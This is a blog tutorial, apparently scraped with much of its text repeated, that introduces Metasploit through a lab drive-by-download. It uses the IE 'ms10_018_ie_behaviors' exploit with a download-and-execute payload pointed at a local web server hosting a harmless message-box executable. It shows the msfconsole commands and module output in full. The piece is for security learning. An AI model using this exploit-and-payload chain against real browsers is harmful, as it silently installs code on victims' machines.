Brief introduction to Metasploit
As a part of increasing IT-infrastructure security, penetration testing is one of the most valuable tools. Of course, system updates, using firewalls, IDS/IPS, right ACL and other methods are very efficient, but you can't be 100% assured that everything is fine. Security is a battle between defenders and attackers, and usually attackers are one step ahead in this battle.
To be a good security professional, you have to know how attackers work, which tools and methods they are using, you have to be an attacker (of course, white-hat) - embrace Dark Side, but not be dominated by it and stay with Light Side.
So, the Metasploit is one of must-be-known tool for every security professional:
Download the Metasploit Framework: http://www.metasploit.com/framework/download/
No additional packages are required. Ruby and RoR are included in the installer.
The main tool which you will use - the console: msfconsole. Please notice that if you've selected autoupdate from SVN, the console launch time can be pretty long (autoupdate runs during starting up the console).
The main principle of Metasploit usage:
We will use windows/browser/ms10_018_ie_behaviors exploit and windows/download_exec payload. Before that, please make ready the Windows executable and upload it to the webserver. I would like to recommend to make executable via cross-compilation and use SimpleHTTPServer for distributing it.
Example executable source code:
Compile it and start a web server:
Now it's time to start msfconsole:
You've got a MSF prompt. Let's get information about the required exploit and payload:
msf > info windows/browser/ms10_018_ie_behaviors
Name: Internet Explorer DHTML Behaviors Use After Free
Version: 9787
Platform: Windows
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Good
Provided by:
unknown
Trancer <mtrancer@gmail.com>
Nanika
jduck <jduck@metasploit.com>
Available targets:
Id Name
-- ----
0 (Automatic) IE6, IE7 on Windows NT, 2000, XP, 2003 and Vista
1 IE 6 SP0-SP2 (onclick)
2 IE 7.0 (marquee)
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
Payload information:
Space: 1024
Avoid: 6 characters
Description:
This module exploits a use-after-free vulnerability within the DHTML
behaviors functionality of Microsoft Internet Explorer versions 6
and 7. This bug was discovered being used in-the-wild and was
previously known as the "iepeers" vulnerability. The name comes from
Microsoft's suggested workaround to block access to the iepeers.dll
file. According to Nico Waisman, "The bug itself is when trying to
persist an object using the setAttribute, which end up calling
VariantChangeTypeEx with both the source and the destination being
the same variant. So if you send as a variant an IDISPATCH the
algorithm will try to do a VariantClear of the destination before
using it. This will end up on a call to PlainRelease which deref the
reference and clean the object." NOTE: Internet Explorer 8 and
Internet Explorer 5 are not affected.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-0806
http://www.osvdb.org/62810
http://www.securityfocus.com/bid/38615
http://www.microsoft.com/technet/security/advisory/981374.mspx
http://www.avertlabs.com/research/blog/index.php/2010/03/09/targeted-internet-explorer-0day-attack-announced-cve-2010-0806/
http://eticanicomana.blogspot.com/2010/03/aleatory-persitent-threat.html
http://www.microsoft.com/technet/security/bulletin/MS10-018.mspx
As you can see the exploit target are unpatched IE 6 and IE 7.
It's time to get some action:
Now let's open this URL in unpatched Windows XP. After some hidden actions the required application starts without any confirmations:
This is classical drive-by-download malware infection.
I hope that this article gives you the initial points to increase your knowledge in security. MSF is a great tool, and every security researcher have to know it. There are many topics hold undiscovered, but I'm sure that you can find all the required information in the Internet or by examining MSF source code. Good luck, and let the Force be with you!
To be a good security professional, you have to know how attackers work, which tools and methods they are using, you have to be an attacker (of course, white-hat) - embrace Dark Side, but not be dominated by it and stay with Light Side.
So, the Metasploit is one of must-be-known tool for every security professional:
Metasploit provides useful information and tools for penetration testers, security researchers, and IDS signature developers. This project was created to provide information on exploit techniques and to create a functional knowledgebase for exploit developers and security professionals. The tools and information are provided for legal security research and testing purposes only.There are many information about Metasploit in the Internet, and I strongly recommend to read Metasploit Unleashed. Here I only want to briefly show its usage.
Download the Metasploit Framework: http://www.metasploit.com/framework/download/
No additional packages are required. Ruby and RoR are included in the installer.
The main tool which you will use - the console: msfconsole. Please notice that if you've selected autoupdate from SVN, the console launch time can be pretty long (autoupdate runs during starting up the console).
The main principle of Metasploit usage:
- select exploit which will be used to breach the system;
- select payload which will be executed after the breaking in;
- set up the additional parameters if needed and exploit the target.
We will use windows/browser/ms10_018_ie_behaviors exploit and windows/download_exec payload. Before that, please make ready the Windows executable and upload it to the webserver. I would like to recommend to make executable via cross-compilation and use SimpleHTTPServer for distributing it.
Example executable source code:
#include <windows.h>
INT WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance,
LPSTR lpCmdLine, int nCmdShow)
{
MessageBoxW(0, L"You're pwned!\n", L"MinGW app", MB_ICONEXCLAMATION);
return 0;
}
INT WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance,
LPSTR lpCmdLine, int nCmdShow)
{
MessageBoxW(0, L"You're pwned!\n", L"MinGW app", MB_ICONEXCLAMATION);
return 0;
}
Compile it and start a web server:
$ i586-mingw32msvc-cc msgbox.c -o msgbox.exe -Wl,-subsystem,windows
$ python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...$ python -m SimpleHTTPServer
Now it's time to start msfconsole:
$ msfconsole
o 8 o o
8 8 8
ooYoYo. .oPYo. o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8 o8P
8' 8 8 8oooo8 8 .oooo8 Yb.. 8 8 8 8 8 8 8
8 8 8 8. 8 8 8 'Yb. 8 8 8 8 8 8 8
8 8 8 `Yooo' 8 `YooP8 `YooP' 8YooP' 8 `YooP' 8 8
..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
=[ metasploit v3.5.0-dev [core:3.5 api:1.0]
+ -- --=[ 609 exploits - 306 auxiliary
+ -- --=[ 225 payloads - 27 encoders - 8 nops
=[ svn r10702 updated today (2010.10.16)
msf >
o 8 o o
8 8 8
ooYoYo. .oPYo. o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8 o8P
8' 8 8 8oooo8 8 .oooo8 Yb.. 8 8 8 8 8 8 8
8 8 8 8. 8 8 8 'Yb. 8 8 8 8 8 8 8
8 8 8 `Yooo' 8 `YooP8 `YooP' 8YooP' 8 `YooP' 8 8
..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
=[ metasploit v3.5.0-dev [core:3.5 api:1.0]
+ -- --=[ 609 exploits - 306 auxiliary
+ -- --=[ 225 payloads - 27 encoders - 8 nops
=[ svn r10702 updated today (2010.10.16)
msf >
You've got a MSF prompt. Let's get information about the required exploit and payload:
msf > info windows/browser/ms10_018_ie_behaviors
Name: Internet Explorer DHTML Behaviors Use After Free
Version: 9787
Platform: Windows
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Good
Provided by:
unknown
Trancer <mtrancer@gmail.com>
Nanika
jduck <jduck@metasploit.com>
Available targets:
Id Name
-- ----
0 (Automatic) IE6, IE7 on Windows NT, 2000, XP, 2003 and Vista
1 IE 6 SP0-SP2 (onclick)
2 IE 7.0 (marquee)
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
Payload information:
Space: 1024
Avoid: 6 characters
Description:
This module exploits a use-after-free vulnerability within the DHTML
behaviors functionality of Microsoft Internet Explorer versions 6
and 7. This bug was discovered being used in-the-wild and was
previously known as the "iepeers" vulnerability. The name comes from
Microsoft's suggested workaround to block access to the iepeers.dll
file. According to Nico Waisman, "The bug itself is when trying to
persist an object using the setAttribute, which end up calling
VariantChangeTypeEx with both the source and the destination being
the same variant. So if you send as a variant an IDISPATCH the
algorithm will try to do a VariantClear of the destination before
using it. This will end up on a call to PlainRelease which deref the
reference and clean the object." NOTE: Internet Explorer 8 and
Internet Explorer 5 are not affected.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-0806
http://www.osvdb.org/62810
http://www.securityfocus.com/bid/38615
http://www.microsoft.com/technet/security/advisory/981374.mspx
http://www.avertlabs.com/research/blog/index.php/2010/03/09/targeted-internet-explorer-0day-attack-announced-cve-2010-0806/
http://eticanicomana.blogspot.com/2010/03/aleatory-persitent-threat.html
http://www.microsoft.com/technet/security/bulletin/MS10-018.mspx
msf > info windows/download_exec
Name: Windows Executable Download and Execute
Version: 9488
Platform: Windows
Arch: x86
Needs Admin: No
Total size: 340
Rank: Normal
Provided by:
lion <lion@cnhonker.com>
Name: Windows Executable Download and Execute
Version: 9488
Platform: Windows
Arch: x86
Needs Admin: No
Total size: 340
Rank: Normal
Provided by:
lion <lion@cnhonker.com>
pita <pita@mail.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
URL yes The pre-encoded URL to the executable
Description:
Download an EXE from an HTTP URL and execute it
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
URL yes The pre-encoded URL to the executable
Description:
Download an EXE from an HTTP URL and execute it
As you can see the exploit target are unpatched IE 6 and IE 7.
It's time to get some action:
msf > use windows/browser/ms10_018_ie_behaviors
msf exploit(ms10_018_ie_behaviors) > set payload windows/download_exec
payload => windows/download_exec
msf exploit(ms10_018_ie_behaviors) > set URL "http://192.168.1.4:8000/msgbox.exe"
URL => http://192.168.1.4:8000/msgbox.exe
msf exploit(ms10_018_ie_behaviors) > exploit
[*] Exploit running as background job.
[*] Using URL: http://0.0.0.0:8080/minSVGSK
[*] Local IP: http://192.168.1.4:8080/minSVGSK
[*] Server started.
msf exploit(ms10_018_ie_behaviors) > set payload windows/download_exec
payload => windows/download_exec
msf exploit(ms10_018_ie_behaviors) > set URL "http://192.168.1.4:8000/msgbox.exe"
URL => http://192.168.1.4:8000/msgbox.exe
msf exploit(ms10_018_ie_behaviors) > exploit
[*] Exploit running as background job.
[*] Using URL: http://0.0.0.0:8080/minSVGSK
[*] Local IP: http://192.168.1.4:8080/minSVGSK
[*] Server started.
Now let's open this URL in unpatched Windows XP. After some hidden actions the required application starts without any confirmations:
This is classical drive-by-download malware infection.
I hope that this article gives you the initial points to increase your knowledge in security. MSF is a great tool, and every security researcher have to know it. There are many topics hold undiscovered, but I'm sure that you can find all the required information in the Internet or by examining MSF source code. Good luck, and let the Force be with you!
Comments
Post a Comment